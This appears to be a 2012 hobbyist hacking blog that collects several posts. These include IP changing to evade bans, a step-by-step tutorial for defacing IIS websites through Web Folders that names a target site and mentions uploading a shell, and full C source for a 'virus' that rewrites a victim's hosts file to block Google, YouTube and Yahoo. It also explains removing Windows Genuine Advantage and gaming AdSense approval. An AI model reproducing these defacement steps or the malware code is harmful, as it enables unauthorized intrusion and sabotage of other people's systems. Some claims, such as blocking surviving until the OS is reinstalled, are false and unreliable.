Thursday, 26 July 2012

Change Your IP in 20 Sec

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked
Read It Step By Step:



1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

*Note* This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back. 

How to Hack Website with IIS Exploit. [Tutorial]




In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.
Read It Step By Step :




STEP 1: Click on Start button and open "RUN".







STEP 2: Now Type  this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}





Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".



STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".




STEP 5: Now Click on "Finish"







STEP 6: Now the folder will appear. You can open it and put any deface page or anything.




STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.



Now to view the uploaded site i will go to
 "http://autoqingdao.com/securityalert.txt"
In your case it will be 
" www.[sitename].com/[file name that you uploaded] "

A Virus Program to Block Websites

Hi Friendzzz......

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done.As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.










Here is the sourcecode of the virus :-

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target; int find_root(void);
void block_site(void); int find_root()
{
int done;
struct ffblk ffblk;//File block structure done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} else return 0;
} void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/ fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
} void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

Testing :
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run. 
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this 127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.
I hope you will like it. So, do it yourself and enjoy.....!!!

Monday, 9 April 2012

How To Remove Time Line







Today I am Up here to give a extention for the removal of the Timeline (Facebook) that had already pissed millions if not multi-millions! At this time no permament way exist to remove Timeline but we 
can mess up our local settings to get the old goody-goody way.

Ye'w Can download the extentions from here:
 
I-E 

Saturday, 7 April 2012

window 7 activated without toolkit


How to Remove Windows Genuine Advantage and KB971033
If you are getting nag screens and are not able to use/install programs because your Windows 7 thinks that the copy is not genuine, you can remove the Windows Genuine Advantage even on a legitimate copy of Windows 7. To remove KB971003, follow these steps:
Open Control PanelSelect Programs and FeaturesSelect Installed UpdatesLook for list item “Update for Microsoft Windows (KB971033)”Select the above item, if listed, and click UninstallClose the Programs and Features Windows after the update is removed
You can then proceed to remove Windows Genuine Advantage tool. Do the following to disable/remove the Windows genuine advantage:
1. Open the Run dialog (Windows key + R), type regedit and press enter key.
2. Press F3 to open the Find dialog. Type WGALOGON in the Find Dialog
3. Delete the folder WGALOGON.
4. Close the registry editor and delete the file WgaTray from your system32 folder and from your 'dllcache' folder located inside the system32 folder.
5. Reboot.
You may be prompted to install Windows Genuine Advantage Notifications, but this option can be deselected.
In order to prevent these files from being installed again, make sure your Windows Update in Control Panel is set to Notify but do not automatically download. This way, you can make sure that you are not downloading the same files again.
Alternate Method to Remove Windows Genuine Advantage
Many people are not able to find the WGA files on their computer. I did some research to assist them remove Windows Genuine Advantage.
1 Press Windows Key + R to open the Run window.
2 In the Run window, type cmd to open the command prompt.
3 At the command prompt, type cd \ and press Enter.
4 Now type dir *wga*.* /s to find the wga files.
Once the results are displayed. Make a note of folders where the wga files are located. You can then navigate to these folders using My Computer and rename the files to remove Windows Genuine Advantage notifications.
Note: You may get “access denied” message while renaming/deleting the wga files. Please use Unlocker or Long Path Tool to release the files. registry editor -  http://www.brighthub.com/guides/registry-editor.aspx 

how to speedup !dea 2g


hello guyz i m going to tell u the simple way of speed up !dea 2g damm easy now! follow these steps because i use this fr past 2 months maxx speed of !dea 2g is 20 kbps but if u convert it into 2.5g speed will twice 20 X 2 = 40 kbps
steps -:
1. activate 3g sent ACT 3G to 12345
2. wait till 3g is activated.
3. then if your fone/modem is 3g capable then change setting into HSPA/UTMS
4. now activate simple 2g plan eg -: rs 15 plan
5. over! your speed will be twice because you hav activated 3g & using 2g plans so company will give you 2.5 g speed.

how to google adsense it will approved in 2 days garanteed







for many days i m waiting for the trick how to approve this ultimate sourse of online earning google adsense google pay highest money per click minimum 0.50$ per click :D
but it will not approve many times. the only way to aaprove it to follow these steps


1. minimum 1000+ page view per day
it will not possible many times so use this way
steps :-
1. create a new gmail account
2. make yourself admin in of your blog with that id.
3. now upload minimum 5-6 videos on youtube with that new gmail account.
4. wait for minimum 400 views
5. then apply for google adsense it will approve add gadget where you want.